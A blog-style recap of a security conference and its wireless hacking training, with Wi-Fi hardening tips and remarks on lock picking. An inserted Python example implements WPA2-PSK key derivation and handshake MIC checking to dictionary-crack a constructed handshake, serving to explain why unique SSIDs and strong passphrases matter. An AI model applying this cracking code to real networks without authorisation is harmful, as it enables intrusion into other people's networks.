Well, I spent three days this week attending the SecTor pre-con training on Wireless Hacking and SecTor itself, and it was worth every minute! The group behind SecTor put on a great event (I should note I was on the advisory committee) with world-class speakers from around the world. I thought I’d provide a quick recap along with some links to help you keep up with the ever-changing face of IT security.
Wireless Hacking with Dino Covotsos was without a doubt the most interesting training experience I have attended in a long time. First off, I haven’t spent an entire day using Linux in a while, and the totally hands-on approach Dino and his co-instructor Charlie used really allowed the entire class to test out WEP and WPA/WPA2 cracking techniques as well as the steps to mitigate them. It was also very nice to have Edmonton’s very own Brad “RenderMan” Haines on hand to share his vast insight into wireless security. While, like you, I had read that WEP was insecure and had not used it in a few years, I didn’t realize the tools available could crack WEP in minutes. Actually testing it out on a demo wireless access point really drives home the point. I didn’t realize that the same was also true for WPA/WPA2 access points. While those are a little more difficult (I did get in after about 20 minutes), they are easy to exploit but do offer some mitigation. So what did I walk away with?
- MAC Address Filtering is ineffective on its own as there are tools to change a MAC with one command
- Not broadcasting your SSID is also ineffective: the traffic can still be “seen” with a wireless sniffer, and the SSID appears in the probe and association frames every time a client connects
- Change your SSID. WPA/WPA2-PSK derives the key from the passphrase with PBKDF2 using the SSID as the salt, so a precomputed (rainbow-style) table is only valid for the one SSID it was built for. Such tables are available to download online for the most popular SSIDs (Linksys, default, SMC, Home and another 997 common SSIDs). Using something unique forces the attacker either to generate their own table or to hash every candidate passphrase on the fly, both of which take a long time.
- Cycle your SSID. In the last point I mentioned it would take a long time, but not forever 🙂 A table built against your old SSID is wasted effort once you change it.
- Use a complex WPA/WPA2 key! Follow the same principles you would for a secure domain admin password: 16+ characters, a mix of upper/lowercase, numbers and special characters, and throw in a space or two. Dictionary and table attacks only succeed when your passphrase is in the attacker’s wordlist, so passphrases are better than passwords!
- Even though I stated MAC filtering and hidden SSIDs are ineffective on their own, combined with the techniques above they add a little friction to your security model; just never count them as a control by themselves.
- If you can, use authentication on your WiFi networks. 802.1X (WPA/WPA2-Enterprise) backed by a RADIUS server works well, ideally EAP-TLS with client certificates. With per-user authentication there is no shared passphrase for a captured handshake to be cracked against.
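To make the “SSID is the salt” point concrete, here is an added example (my own code, not material from the training or from this post) that implements the WPA2-PSK key derivation (PBKDF2-HMAC-SHA1, 4096 iterations, salted with the SSID), the PRF-512 expansion to the PTK and the EAPOL-Key MIC check an offline cracker uses, then builds precomputed PMK tables for a few common SSIDs and runs a dictionary attack against a constructed 4-way handshake. The wordlist, SSIDs, MAC addresses, nonces and the minimal EAPOL-Key message are all constructed for the demo; the MIC is the WPA2/AES (key descriptor version 2) HMAC-SHA1-128 variant, whereas original WPA/TKIP uses HMAC-MD5.

```python
import hashlib
import hmac
import random

PBKDF2_ITERATIONS = 4096  # iteration count fixed by the WPA-PSK specification


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK master key: PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), PBKDF2_ITERATIONS, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: expand the PMK with both MAC addresses and both nonces from the handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 160 bits covers the 512 bits of PTK needed
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/AES): HMAC-SHA1 over the EAPOL-Key frame with its MIC zeroed, cut to 128 bits."""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


def handshake_passes(pmk: bytes, hs: dict) -> bool:
    """Does this candidate PMK reproduce the MIC sniffed in message 2 of the 4-way handshake?"""
    kck = ptk_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]  # KCK = first 128 bits of PTK
    return hmac.compare_digest(eapol_mic(kck, hs["eapol_zeroed"]), hs["mic"])


def make_handshake(ssid: str, passphrase: str, seed: int = 1) -> dict:
    """Constructed stand-in for a sniffed handshake (message 2, supplicant -> AP); not a real capture."""
    rnd = random.Random(seed)

    def rb(n: int) -> bytes:
        return bytes(rnd.getrandbits(8) for _ in range(n))

    aa, spa, anonce, snonce = rb(6), rb(6), rb(32), rb(32)
    # Minimal EAPOL-Key message 2 layout with the 16-byte MIC field zeroed, exactly as a cracker hashes it.
    eapol_zeroed = (b"\x01\x03\x00\x5f" + b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 8
                    + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol_zeroed": eapol_zeroed, "mic": eapol_mic(kck, eapol_zeroed)}


def precompute_tables(ssids, wordlist) -> dict:
    """The expensive part, done once per SSID: PMK -> passphrase for every word. Useless for any other SSID."""
    return {ssid: {pmk_from_passphrase(w, ssid): w for w in wordlist} for ssid in ssids}


def crack(hs: dict, tables: dict, wordlist) -> tuple:
    """Return (recovered passphrase or None, number of PBKDF2 computations spent).
    Known SSID: only cheap PTK/MIC checks against the table. Unknown SSID: PBKDF2 per candidate."""
    if hs["ssid"] in tables:
        for pmk, word in tables[hs["ssid"]].items():
            if handshake_passes(pmk, hs):
                return word, 0
        return None, 0  # passphrase not in the wordlist the table was built from
    cost = 0
    for word in wordlist:
        cost += 1
        if handshake_passes(pmk_from_passphrase(word, hs["ssid"]), hs):
            return word, cost
    return None, cost


if __name__ == "__main__":
    # Constructed wordlist and SSID list for the demo.
    wordlist = ["password", "letmein", "linksys", "password1", "qwerty123"]
    tables = precompute_tables(["linksys", "default", "NETGEAR"], wordlist)
    for ssid, passphrase in [("linksys", "password1"),                      # default SSID, weak key: table hit
                             ("k7-basement-net", "password1"),              # unique SSID: must hash on the fly
                             ("linksys", "correct horse battery staple 42!")]:  # strong passphrase: not found
        found, cost = crack(make_handshake(ssid, passphrase), tables, wordlist)
        print(f"SSID {ssid!r}: recovered={found!r} PBKDF2 calls={cost}")
```

The three runs show the bullets above in order: a default SSID with a weak key falls to a table lookup with no PBKDF2 work at all, a unique SSID forces the attacker to pay 4096 iterations per candidate, and a passphrase that is not in the wordlist is not recovered either way. Real tools read the MACs, nonces and EAPOL frame out of a capture file; the only thing that changes is where the handshake comes from.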
At the actual event itself, the most popular area had to be the Lock Picking Village hosted by Deviant Ollam. Again, seeing someone pick a lock on TV or in a movie looks pretty simple; what you might not realize is that in most cases it is even simpler. Bump keys, wafer keys, Bic pens and beer cans are all very common and can get a large majority of locks open in seconds. It didn’t take much for me to pick up the tools and give it a try, opening most locks, from your basic combination lock to bike locks to deadbolts, in seconds. Deviant’s Kahlua-and-milk-powered session really made you think about physical security. I urge you to look at the content on his page and re-assess the physical security in your building.
It wasn’t all technical though, as Johnny Long was back, this time delivering a keynote titled No Tech Hacking based on his new book. Johnny was a very entertaining and enlightening speaker who makes you look at the people, places and things around you in a very different way. His swag was the most popular at the event as well, selling out long before anything else did, most likely due to the fact that 100% of the money went to his group called http://ihackcharities.org/
As I drove home on Wednesday night after the event, all I could think about was October 5-7, 2009, as I am already looking forward to SecTor 2009!